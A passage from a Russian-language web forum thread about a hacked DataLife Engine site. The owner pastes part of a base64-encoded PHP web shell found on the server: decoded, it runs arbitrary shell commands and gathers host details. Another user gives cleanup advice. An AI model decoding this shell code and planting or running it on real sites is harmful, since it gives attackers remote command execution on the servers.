'KTsgQG9iX2NsZWFuKCk7IHBhc3N0aHJ1KCRjbWQpOyAkcmVzdWx0ID0gQG9iX2dldF9jb250ZW50'.

'cygpOyBAb2JfY2xlYW4oKTsgZWNobyAkdjsNCiAgICAgICAgfSBlbHNlaWYgKGlzX3Jlc291cmNl'.

'KCRmcCA9IHBvcGVuKCRjbWQsInIiKSkpIHsNCiAgICAgICAgICAkcmVzdWx0ID0gIiI7DQogICAg'.

'ICAgICAgd2hpbGUoIWZlb2YoJGZwKSkgeyAkcmVzdWx0IC49IGZyZWFkKCRmcCwxMDI0KTsgfQ0K'.

'ICAgICAgICAgIHBjbG9zZSgkZnApOw0KICAgICAgICB9DQogICAgICB9DQogICAgICByZXR1cm4g'.

'JHJlc3VsdDsNCiAgICB9DQogIH0NCn0NCmZ1bmN0aW9uIGV4KCRjZmUpIHsNCiAgJHJlcyA9ICcn'.

'Ow0KICBpZiAoIWVtcHR5KCRjZmUpKSB7DQogICAgaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykp'.

'IHsNCiAgICAgIEBleGVjKCRjZmUsJHJlcyk7DQogICAgICAkcmVzID0gam9pbigiXG4iLCRyZXMp'.

'Ow0KICAgIH0gZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKSB7DQogICAgICAk'.

'cmVzID0gQHNoZWxsX2V4ZWMoJGNmZSk7DQogICAgfSBlbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdz'.

'eXN0ZW0nKSkgew0KICAgICAgQG9iX3N0YXJ0KCk7DQogICAgICBAc3lzdGVtKCRjZmUpOw0KICAg'.

'ICAgJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCiAgICAgIEBvYl9lbmRfY2xlYW4oKTsNCiAg'.

'ICB9IGVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1JykpIHsNCiAgICAgIEBvYl9zdGFy'.

'dCgpOw0KICAgICAgQHBhc3N0aHJ1KCRjZmUpOw0KICAgICAgJHJlcyA9IEBvYl9nZXRfY29udGVu'.

'dHMoKTsNCiAgICAgIEBvYl9lbmRfY2xlYW4oKTsNCiAgICB9IGVsc2VpZihAaXNfcmVzb3VyY2Uo'.

'JGYgPSBAcG9wZW4oJGNmZSwiciIpKSkgew0KICAgICAgJHJlcyA9ICIiOw0KICAgICAgd2hpbGUo'.

'IUBmZW9mKCRmKSkgeyAkcmVzIC49IEBmcmVhZCgkZiwxMDI0KTsgfQ0KICAgICAgQHBjbG9zZSgk'.

'Zik7DQogICAgfSBlbHNlIHsgJHJlcyA9ICJFeCgpIERpc2FibGVkISI7IH0NCiAgfQ0KICByZXR1'.

'cm4gJHJlczsNCn0NCmZ1bmN0aW9uIHdoaWNoKCRwcikgew0KICAkcGF0aCA9IGV4KCJ3aGljaCAk'.

'cHIiKTsNCiAgaWYoIWVtcHR5KCRwYXRoKSkgeyByZXR1cm4gJHBhdGg7IH0gZWxzZSB7IHJldHVy'.

'biAkcHI7IH0NCn0NCg0KJGhvc3RuYW1lX3ggPSBwaHBfdW5hbWUobik7DQokaXRzaG9tZSA9IGdl'.

.....................

.....................

в папке Uploads/fotos ишо такое хрень :huh:

Изменено 20 февраля 2011 пользователем 6748222

ower_xz · 20 февраля 2011

В админке антивирус запустите, он покажет лишние файлы, которые удалить нужно. Если сомневаетесь насчет изменений в коде скрипта, перезалейте чистый дистрибутив от вашей версии dle, кроме engine/data (там настройки вашего сайта и б.д. - их тоже просмотрите) и uploads. Если к базе данных после этого не подключится, делайте восстановление б.д. из бекапа. Меняйте все пароли и смотрите логи. На форуме уже много писалось про действия в аналогичной ситуации.

20 февраля 2011

только етот: ./engine/classes/geoip/geoipregionvars.php

я вручную удалил 4 ~ 5 php фаили

Изменено 20 февраля 2011 пользователем 6748222

ower_xz · 20 февраля 2011

Все что антивирус показывает удаляйте.

Кстати, вы же в клиентах находитесь. Напишите через обратную связь на dle-news, что на форуме вас перевели в клиенты - проще помощь будет получать.

20 февраля 2011

в папке Uploads/fotos ишо такое хрень

молодой чемодан скозал обнаружил етот баг с "Image shell" ишо месец назад.. я чегото пропустил или ета DLE баг? :blink:

Изменено 20 февраля 2011 пользователем 6748222

ower_xz · 20 февраля 2011

http://dle-news.ru/tips/1164-zaschita-papok-skripta-ot-zapuska-storonnih-skriptov.html

Войти

какнули саит

Рекомендованные сообщения

6748222 1

Ссылка на сообщение

Поделиться на других сайтах

ower_xz 117

Ссылка на сообщение

Поделиться на других сайтах

6748222 1

Ссылка на сообщение

Поделиться на других сайтах

ower_xz 117

Ссылка на сообщение

Поделиться на других сайтах

6748222 1

Ссылка на сообщение

Поделиться на других сайтах

ower_xz 117

Ссылка на сообщение

Поделиться на других сайтах

Присоединяйтесь к обсуждению

Форум

Активность